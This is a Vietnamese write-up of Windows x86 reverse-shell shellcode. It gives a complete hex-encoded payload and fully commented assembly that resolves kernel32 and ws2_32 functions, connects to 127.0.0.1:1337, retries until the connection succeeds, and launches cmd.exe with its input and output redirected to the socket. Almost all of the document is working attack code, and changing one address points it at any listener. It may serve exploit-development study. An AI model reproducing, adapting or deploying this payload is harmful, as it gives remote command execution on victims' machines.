
Shellcode cho phép kết nối tới địa chỉ 127.0.0.1:1337 và thực hiện các lệnh được gửi từ xa

------------------------------------------------------------------- 

"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x31\xc0\x50\x83\xec\x18\x8d\x34\x24\x89\x16\x89\xcf\x68\x73\x41\x42\x42\x66\x89\x44\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x04\x24\x50\x51\xff\xd2\x83\xc4\x10\x89\x46\x04\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x08\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x31\xc9\x68\x6c\x6c\x41\x41\x66\x89\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x8d\x0c\x24\x51\xff\xd0\x83\xc4\x08\x89\xc7\x31\xc9\x68\x75\x70\x41\x41\x66\x89\x4c\x24\x02\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x50\xff\x16\x83\xc4\x0c\x89\x46\x0c\x31\xc9\x68\x74\x41\x42\x42\x66\x89\x4c\x24\x02\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x10\x31\xc9\x68\x63\x74\x41\x41\x66\x89\x4c\x24\x02\x68\x6f\x6e\x6e\x65\x68\x57\x53\x41\x43\x8d\x0c\x24\x51\x57\xff\x16\x83\xc4\x0c\x89\x46\x14\x31\xc9\x51\x66\xb9\x90\x01\x29\xcc\x8d\x0c\x24\x31\xdb\x66\xbb\x02\x02\x51\x53\xff\x56\x0c\x31\xc9\x51\x51\x51\xb1\x06\x51\x83\xe9\x05\x51\x41\x51\xff\x56\x10\x97\x31\xc9\x51\x51\x51\x51\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\x39\xc7\x44\x24\x04\x7f\x01\x01\x01\x31\xc9\x8d\x1c\x24\x51\x51\x51\x51\xb1\x10\x51\x53\x57\xff\x56\x14\x31\xc9\x39\xc8\x75\xe9\x31\xc9\x83\xec\x10\x8d\x14\x24\x57\x57\x57\x51\x66\x51\x66\x51\xb1\xff\x41\x51\x31\xc9\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\xb1\x44\x51\x8d\x0c\x24\x31\xd2\x68\x65\x78\x65\x41\x88\x54\x24\x03\x68\x63\x6d\x64\x2e\x8d\x14\x24\x53\x51\x31\xc9\x51\x51\x51\x41\x51\x31\xc9\x51\x51\x52\x51\xff\x56\x04\x50\xff\x56\x08";



-------------------------------------------------------------------
Các bước tạo shellcode:
-------------------------------------------------------------------
	Tìm Base Address của Kernel32.dll (*)
	Tìm export table của nó (*)
	Tìm địa chỉ hàm GetProcAddress trong kernel32.dll (*)
	Dùng hàm GetProcAddress để tìm địa chỉ của các hàm: LoadLibrary, CreateProcess, ExitThread
	Dùng LoadLibrary để load ws2_32.dll
	Tìm địa chỉ của các hàm WSAStartup, WSASocket, WSAConnect trong dll vừa load lên 
	Chạy lần lượt 3 hàm WSAStartup, WSASocket, WSAConnect để kết nối tới IP và PORT qua socket
	CreateProcess cmd.exe với các tham số cần thiết để redirect stream đến socket vừa tạo
	Chạy ExitThread để tránh crash chương trình

 	(*) https://www.zinzloun.info/
 		https://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/
	

-------------------------------------------------------------------
Chú giải chi tiết:
;------------------------------------------------------------------------------------------------
;Tìm base kernel32 + addr GetProcAddress

	xor ecx,ecx
	mov eax, [fs:ecx+0x30] 							;PEB
	mov eax,[eax+0xc] 								;PEB->Ldr
	mov esi,[eax+0x14] 								;PEB->ldr.InMemOrderModuleList
	lodsd											
	xchg eax, esi 
	lodsd 											;EAX = module thứ 3 (kernel32.dll)
	mov ecx,[eax+0x10] 								;base address kernel32.dll 				
	mov ebx,[ecx+0x3c] 								;DOS->elf_anew
	add ebx,ecx 									;PE HEADER
	mov ebx,[ebx+0x78] 								;DataDirectory->VirtualAddress
	add ebx,ecx 									;IMAGE_EXPORT_DIRECTORY
	 
	mov esi,[ebx+0x20] 								;AddressOfNames
	add esi,ecx
	xor edx,edx

 
Get_Function:
 
	inc edx 										
	lodsd 											;name offset
	add eax,ecx 									;function name
	cmp dword [eax],'GetP'
	jne Get_Function
	cmp dword [eax+4],'rocA'
	jne Get_Function
	cmp dword [eax+8],'ddre'
	jne Get_Function
 
	mov esi,[ebx+0x1c] 								;AddressOfFunctions
	add esi,ecx
	mov edx,[esi+edx*4]
	add edx,ecx 									;GetProcAddress()
	xor eax,eax
	push eax
	sub esp,24
	lea esi,[esp] 
	mov [esi],dword edx 							;GetProcAddress = esi
	mov edi,ecx 									;EDI = kernel32.dll
 
;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm CreateProcessA() trong kernel32
 
	push 0x42424173
	mov [esp+2],word ax 								
	push 0x7365636f
	push 0x72506574
	push 0x61657243
	lea eax,[esp] 	

	push eax 											
	push ecx 											
	 
	call edx 											

	add esp,16
	mov [esi+4],dword eax 								;CreateProcess = esi+4

;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm ExitProcess() trong kernel32

	xor ecx,ecx
	push 0x41737365
	mov [esp+3],byte cl
	push 0x636f7250
	push 0x74697845
	lea ecx,[esp]
	push ecx 											
	push edi 											
	 
	call dword [esi] 									
	 
	add esp,12
	mov [esi+8],dword eax 							 	;ExitProcess = esi+8

;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm LoadLibrary trong kernel32
 
	xor ecx,ecx
	push ecx
	push 0x41797261
	push 0x7262694c
	push 0x64616f4c
	lea ecx,[esp]
	 
	push ecx
	push edi
	 
	call dword [esi] 									;EAX = LoadLibrary		
	add esp,12

;------------------------------------------------------------------------------------------------
;Load ws2_32.dll
	 
	xor ecx,ecx
	push 0x41416c6c
	mov [esp+2],word cx
	push 0x642e3233
	push 0x5f327377
	lea ecx,[esp]
	 
	push ecx 											
	call eax 											
	add esp,8
	 
	mov edi,eax 										;EDI = ws2_32.dll
 
;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm WSAStartup() trong ws2_32.dll

	xor ecx,ecx
	push 0x41417075
	mov [esp+2],word cx
	push 0x74726174
	push 0x53415357
	lea ecx,[esp]
	push ecx
	push eax
	 
	call dword [esi] 									
	add esp,12
	 
	mov [esi+12],dword eax 								;WSAStartup = esi+12
 
;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm WSASocketA() trong ws2_32.dll 
 
	xor ecx,ecx
	push 0x42424174
	mov [esp+2],word cx
	push 0x656b636f
	push 0x53415357
	lea ecx,[esp]
	 
	push ecx
	push edi
	 
	call dword [esi] 									
	add esp,12
	 
	mov [esi+16],dword eax 								;WSASocketA = esi+16

;------------------------------------------------------------------------------------------------
;Tìm địa chỉ của hàm WSAConnect trong ws2_32.dll

	xor ecx,ecx
	push 0x41417463
	mov [esp+2],word cx
	push 0x656e6e6f
	push 0x43415357
	lea ecx,[esp]
	 
	push ecx
	push edi
	 
	call dword [esi] 										
	add esp,12
	 
	mov [esi+20],dword eax 									;WSAConnect = esi+20

;------------------------------------------------------------------------------------------------
;WSAStartup(514, &WSADATA)
 
	xor ecx,ecx
	push ecx
	mov cx,400
	sub esp,ecx
	lea ecx,[esp]
	 
	xor ebx,ebx
	mov bx,514
	 
	push ecx
	push ebx
	 
	call dword [esi+12]
 
;------------------------------------------------------------------------------------------------
;WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,NULL,NULL)
 
	xor ecx,ecx
	push ecx
	push ecx
	push ecx
	mov cl,6
	push ecx
	 
	sub ecx,5
	push ecx
	inc ecx
	push ecx
	 
	call dword [esi+16]
	 
	xchg edi,eax 											;EDI = socket
 
;------------------------------------------------------------------------------------------------
;WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL)

	xor ecx,ecx
	push ecx
	push ecx
	push ecx
	push ecx
	 
	mov [esp],byte 2
	mov [esp+2],word 0x3905 								;port 1337
	mov [esp+4],0x0101017f  								;IP
	 
connect:
	xor ecx,ecx
	lea ebx,[esp] 											;EBX = SOCKADDR
	 
	push ecx
	push ecx
	push ecx
	push ecx 
	mov cl,16
	push ecx
	push ebx
	push edi
	 
	call dword [esi+20]
	xor ecx,ecx
	 
	cmp eax,ecx
	jnz connect 											;loop cho đến khi kết nối được

;------------------------------------------------------------------------------------------------
;redirect stream

	xor ecx,ecx
	sub esp,16
	lea edx,[esp] 											;PROCESS_INFORMATION
	 
	push edi
	push edi
	push edi
	push ecx
	push word cx
	push word cx
	 
	mov cl,255
	inc ecx
	 
	push ecx
	xor ecx,ecx
	 
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	push ecx
	 
	mov cl,68
	push ecx
	lea ecx,[esp]
	xor edx,edx
	push 0x41657865
	mov [esp+3],byte dl
	push 0x2e646d63
	 
	lea edx,[esp]

;------------------------------------------------------------------------------------------------
;CreateProcessA(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&ini_processo,&processo_info)
 
	push ebx
	push ecx
	xor ecx,ecx
	push ecx
	push ecx
	push ecx
	inc ecx
	push ecx
	xor ecx,ecx
	push ecx
	push ecx
	push edx
	push ecx
	 
	call dword [esi+4]

;------------------------------------------------------------------------------------------------
;ExitProcess(0)

	push eax
	call dword [esi+8]


 